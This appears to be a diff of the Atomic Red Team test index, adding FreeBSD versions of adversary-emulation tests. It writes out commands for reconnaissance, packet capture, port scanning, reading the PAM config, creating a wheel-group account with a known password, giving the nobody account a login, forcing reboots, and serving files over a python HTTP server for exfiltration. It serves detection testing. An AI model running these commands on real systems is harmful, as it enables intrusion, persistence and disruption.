||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed
|
||||
type: path
|
||||
default: "/tmp/T1087.001.txt"
|
||||
executor:
|
||||
command: |
|
||||
lastlogin > #{output_file}
|
||||
cat #{output_file}
|
||||
cleanup_command: 'rm -f #{output_file}
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Enumerate users and groups
|
||||
@@ -64403,7 +66685,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -64517,6 +66798,20 @@ discovery:
|
||||
command: |
|
||||
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
|
||||
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
|
||||
- name: Detect Virtualization Environment (FreeBSD)
|
||||
auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd
|
||||
description: |
|
||||
Detects execution in a virtualized environment.
|
||||
At boot, dmesg stores a log if a hypervisor is detected.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization
|
||||
Environment detected"; fi
|
||||
|
||||
'
|
||||
T1069.002:
|
||||
technique:
|
||||
modified: '2023-04-07T17:16:47.754Z'
|
||||
@@ -64665,6 +66960,18 @@ discovery:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: System Service Discovery - service
|
||||
auto_generated_guid: b2e1c734-7336-40f9-b970-b04731cbaf8a
|
||||
description: 'Enumerates system service using service
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'service -e
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1040:
|
||||
technique:
|
||||
modified: '2023-04-12T23:31:49.085Z'
|
||||
@@ -64782,6 +67089,117 @@ discovery:
|
||||
tshark -c 5 -i #{interface}
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using tshark or tcpdump
|
||||
auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67
|
||||
description: |
|
||||
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
|
||||
|
||||
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
interface:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if at least one of tcpdump or tshark is installed.
|
||||
|
||||
'
|
||||
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
|
||||
-v tshark)" ]; then exit 1; else exit 0; fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n"
|
||||
executor:
|
||||
command: |
|
||||
tcpdump -c 5 -nnni #{interface}
|
||||
tshark -c 5 -i #{interface}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
|
||||
seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
|
||||
auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c
|
||||
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
|
||||
and captures packets for a few seconds.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
ifname:
|
||||
description: Specify interface to perform PCAP on.
|
||||
type: string
|
||||
default: em0
|
||||
csource_path:
|
||||
description: Path to C program source
|
||||
type: string
|
||||
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
|
||||
program_path:
|
||||
description: Path to compiled C program
|
||||
type: string
|
||||
default: "/tmp/t1040_freebsd_pcapdemo"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'compile C program
|
||||
|
||||
'
|
||||
prereq_command: 'exit 1
|
||||
|
||||
'
|
||||
get_prereq_command: 'cc #{csource_path} -o #{program_path}
|
||||
|
||||
'
|
||||
executor:
|
||||
command: 'sudo #{program_path} -f -i #{ifname} -t 3
|
||||
|
||||
'
|
||||
cleanup_command: 'rm -f #{program_path}
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
|
||||
auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29
|
||||
description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few
|
||||
@@ -65023,6 +67441,38 @@ discovery:
|
||||
'
|
||||
name: bash
|
||||
elevation_required: true
|
||||
- name: Network Share Discovery - FreeBSD
|
||||
auto_generated_guid: 77e468a6-3e5c-45a1-9948-c4b5603747cb
|
||||
description: 'Network Share Discovery using smbstatus
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
package_checker:
|
||||
description: Package checking command. pkg info -x samba
|
||||
type: string
|
||||
default: "(pkg info -x samba &>/dev/null)"
|
||||
package_installer:
|
||||
description: Package installer command. pkg install -y samba413
|
||||
type: string
|
||||
default: "(which pkg && pkg install -y samba413)"
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Package with smbstatus (samba) must exist on device
|
||||
|
||||
'
|
||||
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
|
||||
1; fi
|
||||
|
||||
'
|
||||
get_prereq_command: "#{package_installer} \n"
|
||||
executor:
|
||||
command: 'smbstatus --shares
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1120:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:41.575Z'
|
||||
@@ -65162,7 +67612,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -65217,13 +67666,24 @@ discovery:
|
||||
sudo lsmod | grep -i "virtio_pci\|virtio_net"
|
||||
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
|
||||
name: bash
|
||||
- name: FreeBSD VM Check via Kernel Modules
|
||||
auto_generated_guid: eefe6a49-d88b-41d8-8fc2-b46822da90d3
|
||||
description: 'Identify virtual machine host kernel modules.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat | grep -i "vmm"
|
||||
kldstat | grep -i "vbox"
|
||||
name: sh
|
||||
- name: Hostname Discovery
|
||||
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
|
||||
description: 'Identify system hostname for FreeBSD, Linux and macOS systems.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -65238,9 +67698,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'env
|
||||
|
||||
@@ -65261,6 +67720,20 @@ discovery:
|
||||
kmod list
|
||||
grep vmw /proc/modules
|
||||
name: sh
|
||||
- name: FreeBSD List Kernel Modules
|
||||
auto_generated_guid: 4947897f-643a-4b75-b3f5-bed6885749f6
|
||||
description: 'Enumerate kernel modules loaded. Upon successful execution stdout
|
||||
will display kernel modules loaded, followed by list of modules matching ''vmm''
|
||||
if present.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
kldstat
|
||||
kldstat | grep vmm
|
||||
name: sh
|
||||
T1010:
|
||||
technique:
|
||||
modified: '2023-04-15T16:46:04.776Z'
|
||||
@@ -65679,7 +68152,6 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
@@ -65692,6 +68164,28 @@ discovery:
|
||||
cat #{output_file} 2>/dev/null
|
||||
cleanup_command: 'rm -f #{output_file} 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: List Google Chromium Bookmark JSON Files on FreeBSD
|
||||
auto_generated_guid: 88ca025b-3040-44eb-9168-bd8af22b82fa
|
||||
description: 'Searches for Google Chromium''s Bookmark file (on FreeBSD) that
|
||||
contains bookmarks in JSON format and lists any found instances to a text
|
||||
file.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Path where captured results will be placed.
|
||||
type: path
|
||||
default: "/tmp/T1217-Chrome.txt"
|
||||
executor:
|
||||
command: |
|
||||
find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \;
|
||||
cat #{output_file} 2>/dev/null
|
||||
cleanup_command: 'rm -f #{output_file} 2>/dev/null
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1016:
|
||||
@@ -65788,6 +68282,20 @@ discovery:
|
||||
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
|
||||
name: sh
|
||||
- name: System Network Configuration Discovery (freebsd)
|
||||
auto_generated_guid: 7625b978-4efd-47de-8744-add270374bee
|
||||
description: |
|
||||
Identify network configuration information.
|
||||
|
||||
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
|
||||
if [ -x "$(command -v netstat)" ]; then netstat -Sp tcp | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
|
||||
name: sh
|
||||
T1087:
|
||||
technique:
|
||||
modified: '2023-04-15T17:24:23.029Z'
|
||||
@@ -66006,9 +68514,8 @@ discovery:
|
||||
|
||||
https://perishablepress.com/list-files-folders-recursively-terminal/
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -66034,9 +68541,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file used to store the results.
|
||||
@@ -66139,7 +68645,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -66423,7 +68928,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -66575,9 +69079,8 @@ discovery:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: |
|
||||
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
|
||||
@@ -66670,6 +69173,18 @@ discovery:
|
||||
|
||||
'
|
||||
name: bash
|
||||
- name: Examine password complexity policy - FreeBSD
|
||||
auto_generated_guid: a7893624-a3d7-4aed-9676-80498f31820f
|
||||
description: 'Lists the password complexity policy to console on FreeBSD.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'cat /etc/pam.d/passwd
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Examine password complexity policy - CentOS/RHEL 7.x
|
||||
auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
|
||||
description: 'Lists the password complexity policy to console on CentOS/RHEL
|
||||
@@ -66819,7 +69334,6 @@ discovery:
|
||||
Upon successful execution, the output will contain the environment variables that indicate
|
||||
the 5 character locale that can be looked up to correlate the language and territory.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'locale
|
||||
@@ -66877,7 +69391,6 @@ discovery:
|
||||
also used as a builtin command that does not generate syscall telemetry but
|
||||
does provide a list of the environment variables.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -67092,6 +69605,18 @@ discovery:
|
||||
executor:
|
||||
command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Security Software Discovery - pgrep (FreeBSD)
|
||||
auto_generated_guid: fa96c21c-5fd6-4428-aa28-51a2fbecdbdc
|
||||
description: |
|
||||
Methods to identify Security Software on an endpoint
|
||||
when sucessfully executed, command shell is going to display AV/Security software it is running.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd''
|
||||
|
||||
'
|
||||
name: sh
|
||||
T1526:
|
||||
@@ -67242,7 +69767,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
dependency_executor_name: sh
|
||||
@@ -67268,7 +69792,6 @@ discovery:
|
||||
|
||||
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -67332,6 +69855,18 @@ discovery:
|
||||
executor:
|
||||
command: 'ip route show
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Remote System Discovery - netstat
|
||||
auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514
|
||||
description: 'Use the netstat command to display the kernels routing tables.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'netstat -r | grep default
|
||||
|
||||
'
|
||||
name: sh
|
||||
- name: Remote System Discovery - ip tcp_metrics
|
||||
@@ -67504,6 +70039,44 @@ discovery:
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Port Scan Nmap for FreeBSD
|
||||
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
|
||||
description: |
|
||||
Scan ports to check for listening ports with Nmap.
|
||||
|
||||
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
|
||||
supported_platforms:
|
||||
- linux
|
||||
input_arguments:
|
||||
host:
|
||||
description: Host to scan.
|
||||
type: string
|
||||
default: 192.168.1.1
|
||||
port:
|
||||
description: Ports to scan.
|
||||
type: string
|
||||
default: '80'
|
||||
network_range:
|
||||
description: Network Range to Scan.
|
||||
type: string
|
||||
default: 192.168.1.0/24
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if nmap command exists on the machine
|
||||
|
||||
'
|
||||
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
|
||||
fi;
|
||||
|
||||
'
|
||||
get_prereq_command: "(which pkg && pkg install -y nmap)\n"
|
||||
executor:
|
||||
command: |
|
||||
nmap -sS #{network_range} -p #{port}
|
||||
telnet #{host} #{port}
|
||||
nc -nv #{host} #{port}
|
||||
name: sh
|
||||
elevation_required: true
|
||||
T1518:
|
||||
technique:
|
||||
modified: '2023-03-30T21:01:50.920Z'
|
||||
@@ -67747,7 +70320,19 @@ discovery:
|
||||
x_mitre_attack_spec_version: 3.1.0
|
||||
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
identifier: T1124
|
||||
atomic_tests: []
|
||||
atomic_tests:
|
||||
- name: System Time Discovery in FreeBSD/macOS
|
||||
auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f
|
||||
description: "Identify system time. Upon execution, the local computer system
|
||||
time and timezone will be displayed. \n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'date
|
||||
|
||||
'
|
||||
name: sh
|
||||
resource-development:
|
||||
T1583:
|
||||
technique:
|
||||
@@ -73810,7 +76395,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -73856,7 +76440,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
pwd_for_encrypted_file:
|
||||
@@ -73895,7 +76478,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
cped_file_path:
|
||||
@@ -73946,7 +76528,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
private_key_path:
|
||||
@@ -74364,9 +76945,8 @@ impact:
|
||||
This test simulates a high CPU load as you might observe during cryptojacking attacks.
|
||||
End the test by using CTRL/CMD+C to break.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'yes > /dev/null
|
||||
|
||||
@@ -74529,7 +77109,6 @@ impact:
|
||||
Overwrites and deletes a file using DD.
|
||||
To stop the test, break the command with CTRL/CMD+C.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -74928,9 +77507,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to restart (can be minutes or specific time)
|
||||
@@ -74948,9 +77526,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
timeout:
|
||||
description: Time to shutdown (can be minutes or specific time)
|
||||
@@ -74968,9 +77545,8 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
command: 'reboot
|
||||
|
||||
@@ -74983,7 +77559,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -p
|
||||
@@ -74991,6 +77566,19 @@ impact:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `halt` - FreeBSD
|
||||
auto_generated_guid: 7b1cee42-320f-4890-b056-d65c8b884ba5
|
||||
description: 'This test restarts a FreeBSD system using `halt`.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'halt -r
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `halt` - Linux
|
||||
auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e
|
||||
description: 'This test restarts a Linux system using `halt`.
|
||||
@@ -75010,7 +77598,6 @@ impact:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff
|
||||
@@ -75018,6 +77605,19 @@ impact:
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `poweroff` - FreeBSD
|
||||
auto_generated_guid: 5a282e50-86ff-438d-8cef-8ae01c9e62e1
|
||||
description: 'This test restarts a FreeBSD system using `poweroff`.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
command: 'poweroff -r 3
|
||||
|
||||
'
|
||||
name: sh
|
||||
elevation_required: true
|
||||
- name: Reboot System via `poweroff` - Linux
|
||||
auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41
|
||||
description: 'This test restarts a Linux system using `poweroff`.
|
||||
@@ -76619,6 +79219,23 @@ initial-access:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Create local account (FreeBSD)
|
||||
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
|
||||
description: 'An adversary may wish to create an account with admin privileges
|
||||
to work with. In this test we create a "art" user with the password art, switch
|
||||
to art, execute whoami, exit and delete the art user.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
|
||||
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
|
||||
cleanup_command: 'rmuser -y art
|
||||
|
||||
'
|
||||
- name: Reactivate a locked/expired account (Linux)
|
||||
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
@@ -76642,6 +79259,30 @@ initial-access:
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "userdel -r art \n"
|
||||
- name: Reactivate a locked/expired account (FreeBSD)
|
||||
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
|
||||
description: "A system administrator may have locked and expired a user account
|
||||
rather than deleting it. \"the user is coming back, at some stage\" An adversary
|
||||
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
|
||||
this test we create a \"art\" user with the password art, lock and expire
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: |
|
||||
pw useradd art -g wheel -s /bin/sh
|
||||
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
|
||||
pw lock art
|
||||
pw usermod art -e +1d
|
||||
pw unlock art
|
||||
pw user mod art -e +99d
|
||||
su art
|
||||
whoami
|
||||
exit
|
||||
cleanup_command: "rmuser -y art \n"
|
||||
- name: Login as nobody (Linux)
|
||||
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
@@ -76660,6 +79301,26 @@ initial-access:
|
||||
nobody\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
|
||||
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
|
||||
- name: Login as nobody (freebsd)
|
||||
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
|
||||
description: 'An adversary may try to re-purpose a system account to appear
|
||||
legitimate. In this test change the login shell of the nobody account, change
|
||||
its password to nobody, su to nobody, exit, then reset nobody''s shell to
|
||||
/usr/sbin/nologin.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
|
||||
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
|
||||
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
|
||||
cleanup_command: |
|
||||
pw usermod nobody -s /usr/sbin/nologin
|
||||
cat /etc/passwd |grep nobody
|
||||
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||||
exfiltration:
|
||||
T1567:
|
||||
technique:
|
||||
@@ -77126,7 +79787,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
input_file:
|
||||
description: Test file to upload
|
||||
@@ -77283,7 +79943,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
domain:
|
||||
description: target SSH domain
|
||||
@@ -77305,7 +79964,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
user_name:
|
||||
description: username for domain
|
||||
@@ -77565,7 +80223,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
file_name:
|
||||
description: File name
|
||||
@@ -77849,7 +80506,6 @@ exfiltration:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
executor:
|
||||
steps: |
|
||||
1. Victim System Configuration:
|
||||
@@ -77872,7 +80528,6 @@ exfiltration:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
steps: "1. On the adversary machine run the below command.\n\n tshark -f
|
||||
@@ -77900,4 +80555,21 @@ exfiltration:
|
||||
command: 'if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090
|
||||
& PID=$!; sleep 10; kill $PID; unset PID; fi
|
||||
|
||||
'
|
||||
- name: Python3 http.server (freebsd)
|
||||
auto_generated_guid: 57a303a2-0bc6-400d-b144-4f3292920a0b
|
||||
description: 'An adversary may use the python3 standard library module http.server
|
||||
to exfiltrate data. This test checks if python3.9 is available and if so,
|
||||
creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds,
|
||||
then kills the PID and unsets the $PID variable.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
command: 'if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server
|
||||
9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
|
||||
|
||||
'
|
||||
|
||||
@@ -829,9 +829,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -853,9 +852,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -877,9 +875,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
numeric_mode:
|
||||
description: Specified numeric mode value
|
||||
@@ -901,9 +898,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
symbolic_mode:
|
||||
description: Specified symbolic mode value
|
||||
@@ -978,9 +974,8 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
owner:
|
||||
description: Username of desired owner
|
||||
@@ -2329,7 +2324,6 @@ defense-evasion:
|
||||
supported_platforms:
|
||||
- macos
|
||||
- linux
|
||||
- freebsd
|
||||
input_arguments:
|
||||
test_message:
|
||||
description: Test message to echo out to the screen
|
||||
@@ -4480,7 +4474,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -4518,7 +4511,6 @@ defense-evasion:
|
||||
description: "Use Perl to decode a base64-encoded text string and echo it to
|
||||
the console \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
